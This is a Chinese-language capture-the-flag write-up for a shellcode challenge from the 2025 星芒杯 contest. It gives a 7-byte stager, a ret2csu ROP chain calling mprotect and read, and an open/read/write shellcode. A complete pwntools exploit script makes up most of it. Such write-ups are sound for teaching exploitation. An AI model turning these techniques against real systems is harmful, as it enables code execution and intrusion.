
不同类型的shellcode题解法

2025 星芒杯

分析

image-20251206191942174

只能输入七个字节，且输入完后权限改为了 r-x，shellcode 段不可写。也就是说这 7 个字节本身做不了 orw，只能用它们把第二阶段读进另一块仍然可写的内存（这里选择栈）。

解决方法为打栈：用这 7 个字节执行 read(0, rsp, rdx)，把 ROP 链直接读到当前栈顶，随后的 ret 会把刚读入的第一个 8 字节当作返回地址，从而进入 ROP 链（这依赖进入 shellcode 时 rax 为 0、rdx 足够大，需对照二进制确认）。

shellcode:

; Stage 1, exactly 7 bytes (31 ff | 54 | 5e | 0f 05 | c3), the most the
; challenge reads. It does no work itself: it pulls the ROP chain onto the
; stack and returns into it.
xor     edi, edi      ; rdi = 0 -> fd stdin
push rsp              ; rsi = rsp: the read lands at the current stack top ...
pop rsi
syscall               ; read(0, rsp, rdx): assumes rax == 0 and rdx holds a
                      ; usable count at entry (presumably left over from the
                      ; program's own read/mprotect calls) -- TODO confirm
ret                   ; ... so the first qword just read is popped as the
                      ; return address: the first csu gadget of the chain

最后 csu 套 csu：第一段 csu 调 mprotect(base, 0x1000, 7) 把 0x600000 所在页改成 rwx，第二段 csu 调 read(0, base, 0x1000) 把 orw shellcode 读进去，并以 base 作为最后的返回地址执行它。

EXP

#!/usr/bin/env python3
"""
author: mick0960
time: 2025-12-06 11:24:33
"""
from pwn import *
from ctypes import *
import inspect

# ----------------function area start----------------#
# Thin wrappers over the global tube ``p`` (created in the predefine area
# below). They resolve ``p`` at call time, so none may be used before it exists.
def sla(ch, data):
    """sendlineafter: wait for *ch*, then send *data* plus a newline."""
    return p.sendlineafter(ch, data)


def sda(ch, data):
    """sendafter: wait for *ch*, then send *data* as-is."""
    return p.sendafter(ch, data)


def sd(data):
    """Send *data* with no terminator."""
    return p.send(data)


def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)


def addr32():
    """Leak helper (not used by this exploit): receive through the first 0xf7
    byte and unpack the trailing 4 bytes as a little-endian 32-bit value —
    presumably a libc pointer whose top byte is 0xf7."""
    return u32(p.recvuntil(b"\xf7")[-4:])


def addr64():
    """Leak helper (not used by this exploit): receive through the first 0x7f
    byte, take the trailing 6 bytes, zero-pad to 8 and unpack as a 64-bit
    value — presumably a libc/stack pointer whose top non-zero byte is 0x7f."""
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))


def ru(con):
    """recvuntil shorthand: consume and return everything through *con*."""
    return p.recvuntil(con)


def lg(addr):
    """Log *addr* under the name of the caller's local that refers to it.

    The name is recovered by matching object identity against the caller's
    frame locals; when several locals hold the same object the last one wins,
    and "Unknown" is printed if none matches. Because the match is by
    identity, small cached ints (0, 1, ...) may be attributed to the wrong
    local. Ints are rendered in hex, anything else verbatim.
    """
    caller_locals = inspect.currentframe().f_back.f_locals
    label = "Unknown"
    for name, value in caller_locals.items():
        if value is addr:
            label = name
    shown = hex(addr) if isinstance(addr, int) else addr
    log.success(f"{label} --> {shown}")


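def _gdb_script(bp, base=None):
    """Render breakpoint spec *bp* as a gdb script, or None if there is none.

    Args:
        bp: None/empty, one hex address string, or a list of them.
        base: when given (PIE), each entry is parsed as a hex offset and
            rebased onto it; when None the entry is used verbatim, so symbol
            names such as ``"main"`` keep working as before.

    Returns:
        str | None: newline-joined ``b *ADDR`` commands.
    """
    if not bp:
        return None
    # A lone string is one breakpoint, not a sequence of characters —
    # joining it directly would emit one gdb line per character.
    specs = [bp] if isinstance(bp, str) else bp
    if base is None:
        return "\n".join(f"b *{spec}" for spec in specs)
    return "\n".join(f"b *{hex(base + int(spec, 16))}" for spec in specs)


def debug(pie=0, bp=None):
    """Attach gdb to the global tube ``p`` with optional breakpoints, then pause.

    Args:
        pie: truthy when the target is PIE; *bp* entries are then hex offsets
            relative to the binary's load base (looked up via ``p.libs()``).
        bp: None, one address string, or a list of them (see ``_gdb_script``).

    Fixes two defects of the previous version: a single-string *bp* was
    joined character by character (garbage script in both branches), and
    PIE breakpoints were emitted as ``*ADDR`` without the leading ``b``.
    """
    # NOTE(review): libs() is keyed by mapped file path; if p.elf.path is not
    # the exact path seen in the maps this raises KeyError — confirm.
    base = p.libs()[p.elf.path] if pie else None
    gdb.attach(p, gdbscript=_gdb_script(bp, base))
    pause()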


# ----------------function area end------------------#
# ----------------predefine area start------------------#
elf_name = "/mnt/f/challenges/test/attachment"
# Spawn the target first; the log level is raised right afterwards so every
# byte exchanged below is dumped.
p = process(elf_name)
context.log_level = "debug"
# context.binary also fixes arch/bits/endianness for asm() and p64() below.
elf = ELF(elf_name)
context.binary = elf
# No libc is needed for this chain (everything goes through the binary's GOT).
libc_name = ""
libc = None
if libc_name:
    libc = ELF(libc_name)


# ----------------predefine area end------------------#
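def csu(func, edi, rsi, rdx, ret, gadget1=0x4013AA, gadget2=0x401390):
    """Build one ret2csu frame: call ``[func]`` with (edi, rsi, rdx), then
    continue into *ret*.

    The layout targets the ``__libc_csu_init`` gadget pair: *gadget1* pops
    rbx, rbp, r12, r13, r14, r15; *gadget2* moves r12d/r13/r14 into
    edi/rsi/rdx and calls through ``[r15 + rbx*8]`` (register order as
    implied by the slot comments below — TODO confirm in the binary). With
    rbx = 0 and rbp = 1 the gadget's ``add rbx,1; cmp rbp,rbx`` exits the
    loop, ``add rsp,8`` plus six pops consume the seven padding qwords, and
    the final ``ret`` lands on *ret*. The defaults are this (non-PIE)
    challenge binary's addresses; pass others for a different target.

    Args:
        func: address that *holds* the function pointer (a GOT entry, as the
            callers below pass), not the function itself — the gadget calls
            through memory.
        edi: first argument; only the low 32 bits reach edi.
        rsi, rdx: second and third arguments (full 64-bit).
        ret: bytes appended after the frame — the next chain or a final
            return address already packed with p64.
        gadget1, gadget2: the two gadget addresses.

    Returns:
        bytes: the 16-qword frame followed by *ret*.
    """
    frame = [
        gadget1,
        0,      # rbx: table index -> call [r15 + 0]
        1,      # rbp: loop bound, so cmp rbp, rbx succeeds after one call
        edi,    # r12 -> edi (low 32 bits only)
        rsi,    # r13 -> rsi
        rdx,    # r14 -> rdx
        func,   # r15 -> pointer to the function pointer (GOT entry)
        gadget2,
    ]
    # add rsp, 8 and pop rbx/rbp/r12/r13/r14/r15 swallow seven qwords
    padding = p64(0) * 7
    return b"".join(p64(value) for value in frame) + padding + ret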


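# Page that mprotect() will turn rwx and read() will fill with the final
# stage. Fixed (non-PIE) and page aligned; assumed to be a mapped page of
# this binary — TODO confirm against its segment map.
base = 0x600000

# Stage 1, exactly 7 bytes (the challenge reads no more than that):
#   31 ff     xor edi, edi        rdi = 0 (stdin)
#   54 5e     push rsp; pop rsi   rsi = rsp
#   0f 05     syscall             read(0, rsp, rdx) — relies on rax == 0 and
#                                 a usable rdx at entry (TODO confirm)
#   c3        ret                 pops the first qword just read -> csu chain
# Must be a bytes literal: as a str, pwntools has to guess an encoding, and
# under utf-8 the 0xff byte becomes two bytes and blows the 7-byte budget.
shellcode = b"\x31\xff\x54\x5e\x0f\x05\xc3"
if len(shellcode) != 7:
    raise ValueError("stage-1 shellcode must be exactly the 7 bytes the target reads")
# debug(pie=0, bp=['0x4012fc'])
sda("can do?", shellcode)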


# Stage 2, consumed by the read() issued from the 7-byte stub. It lands at
# rsp, so its first qword is what the stub's ``ret`` jumps to:
#   1. mprotect(base, 0x1000, 7)  -> PROT_READ|PROT_WRITE|PROT_EXEC on the page
#   2. read(0, base, 0x1000)      -> pull in the orw shellcode
#   3. return into base           -> execute it
# Both calls go through their GOT entries via the csu gadget pair. The whole
# chain has to fit in whatever count the stub's read used — TODO confirm.
stage2_read = csu(elf.got.read, 0, base, 0x1000, p64(base))
stage2 = csu(elf.got.mprotect, base, 0x1000, 7, stage2_read)
sd(stage2)

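# Stage 3: open("flag") / read / write, run from the now-rwx page at base.
# "flag" is pushed as a little-endian imm32; push sign-extends to 8 bytes and
# the top bit is clear, so the stack holds "flag\0\0\0\0" — a NUL-terminated
# path (relative to the target's cwd) with no extra instruction.
# Fix vs. the previous version: write() used the stale count 0x100 from
# read(), echoing stack garbage after the flag; it now writes exactly the
# bytes read, and the stage exits instead of running off the end of the page.
orw = asm(
    """
    push 0x67616c66      /* "flag" + NUL padding on the stack */
    mov rdi, rsp         /* pathname */
    xor esi, esi         /* O_RDONLY */
    push 2
    pop rax              /* SYS_open */
    syscall
    mov rdi, rax         /* fd returned by open */
    mov rsi, rsp         /* reuse the stack as the read buffer */
    mov edx, 0x100
    xor eax, eax         /* SYS_read */
    syscall
    mov rdx, rax         /* write only the bytes actually read */
    mov edi, 1           /* stdout */
    mov rsi, rsp
    push 1
    pop rax              /* SYS_write */
    syscall
    xor edi, edi
    push 60
    pop rax              /* SYS_exit(0): do not fall through into the page */
    syscall
    """
)
sd(orw)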


# Hand the tube to the user so the bytes written by the orw stage (the flag
# file contents) are displayed.
p.interactive()